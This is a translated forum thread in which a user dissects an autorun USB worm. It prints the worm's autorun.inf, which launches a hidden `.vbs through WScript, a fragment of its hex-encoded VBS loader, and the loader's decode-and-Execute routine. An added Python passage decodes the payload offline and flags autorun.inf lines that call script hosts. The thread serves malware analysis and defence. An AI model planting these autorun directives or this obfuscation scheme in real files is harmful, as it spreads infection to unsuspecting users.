Rising Kaka Security Forum

Home » Technical Exchange » Anti-virus / Anti-rogue-software Forum » Ah! Found a virus!!! Rising can't kill it!!!
巴黎没有摩天轮~ - 2013-2-26 21:20:00
Main body:
up.vbe.exe (S H)
`.vbs (S H)
autorun.inf

An autorun virus.

daxian4.0
[AutoRun]
daxianbiyeliunian 2007.8.1
open=WScript.exe .\`.vbs
up.vbe
shell\open=打开(&O)
2007-10-13 13:01:25
shell\open\Command=WScript.exe .\`.vbs
shell\open\Default=1
daxian5.0

The above is autorun.inf.
a="mianshavbs"
P="7665723D22342E3022
74696C653D2264617869616E222676657220
61626F75743D2264617869616E626979656C69756E69616E20323030372E382E3122

and so on.
This is `.vbs
(processed with UE; 0D0A became CRLF, i.e. line feed + carriage return)

:Q="EXECUTE """"":R="&CHR(&H":N=")":DO WHILE LEN(P)>1:IF ISNUMERIC(LEFT(P,1)) THEN Q=Q&R&LEFT(P,2)&N:P=MID(P,3) ELSE Q=Q&R&LEFT(P,4)&N:P=MID(P,5)
LOOP:MsgBox Q

This is the stuff at the end of the virus body.
As you can see, it is all ASCII codes.
I wrote a VB program to turn the ASCII into VBS (something readable).
But the program I wrote has bugs; it can only just barely translate everything.
The translated result:
+++++++++++++++++++ ASSEMBLY CODE LISTING ++++++++++++++++++
//********************** Start of Code in Object .text **************
Program Entry Point = 00046030 (klif.sys.bingd File Offset:00027C30)
See this?
You think it's Kaspersky?
Haha
It's the virus's sys file... impressive, it killed Kaspersky... my computer happens to run Kaspersky... so... when I scanned (manually) under Linux I didn't find it... IceSword showed it in red and I assumed it was fine...
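Added example, not from the post: a Python replay of the decoding loop in the `.vbs stub above, so the hex payload can be recovered offline without handing it to Execute, plus a triage of the posted autorun.inf for directives that launch a script host. The sample hex is the first line of P from the post with one constructed DBCS token appended; treating the 4-digit tokens as GBK code points is an assumption about the host's code page.

```python
# Constructed sample inputs: the first hex chunk of the stub's P string from the
# post, plus one constructed 4-digit token (B4F2 is GBK for the character 打)
# so the wide-character branch is exercised too.
SAMPLE_HEX = "7665723D22342E3022" + "B4F2"

# The autorun.inf as posted: every non "key=value" line is worm version metadata.
SAMPLE_AUTORUN = """daxian4.0
[AutoRun]
daxianbiyeliunian 2007.8.1
open=WScript.exe .\\`.vbs
up.vbe
shell\\open=打开(&O)
2007-10-13 13:01:25
shell\\open\\Command=WScript.exe .\\`.vbs
shell\\open\\Default=1
daxian5.0
"""


def decode_dropper_hex(p: str, codepage: str = "gbk") -> str:
    """Replay the stub's loop: a token starting with a digit is one byte
    (CHR(&Hxx)); anything else is a 4-digit DBCS code (CHR(&Hxxxx)), which
    WScript on a Chinese-locale host resolves through the system code page."""
    out = bytearray()
    while len(p) > 1:
        if p[0].isdigit():
            out.append(int(p[:2], 16))
            p = p[2:]
        else:
            out += int(p[:4], 16).to_bytes(2, "big")
            p = p[4:]
    return out.decode(codepage, errors="replace")


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")


def autorun_launches_script(inf_text: str) -> list:
    """Return the autorun.inf directives that would hand control to a script
    host, ignoring lines without '=' (here, the worm's version tags)."""
    hits = []
    for line in inf_text.splitlines():
        key, sep, value = line.partition("=")
        if not sep or key.strip().lower() not in LAUNCH_KEYS:
            continue
        if any(host in value.lower() for host in SCRIPT_HOSTS):
            hits.append(f"{key.strip()}={value.strip()}")
    return hits
```

Feed `decode_dropper_hex` the full P string to get the plaintext script for static review; the autorun check is a quick way to tell a benign installer autorun.inf from one that points the shell at WScript.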
networkedition - 2013-2-27 9:10:00
OP, please zip the .vbs and upload it in a reply.